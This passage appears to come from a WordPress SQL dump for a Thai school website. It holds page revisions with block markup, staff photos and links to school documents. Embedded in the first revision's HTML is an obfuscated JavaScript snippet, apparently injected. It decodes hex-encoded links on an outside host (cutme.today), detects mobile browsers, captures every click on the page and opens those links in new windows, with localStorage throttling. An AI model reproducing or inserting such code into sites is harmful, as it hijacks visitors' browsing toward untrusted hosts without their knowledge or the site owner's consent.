src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-07-15 16:42:09','2025-07-15 09:42:09','',19,'http://watprato.ssk.in.th/?p=721',0,'revision','',0),
(722,1,'2025-07-15 16:43:23','2025-07-15 09:43:23','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_eaf89e-46\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_eaf89e-46\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ได้รับรางวัล \"สถานศึกษาที่มีวิธีปฏิบัติที่เป็นเลิศ\"</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_2ed102-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_2ed102-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-574\" style=\"width: 250px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button 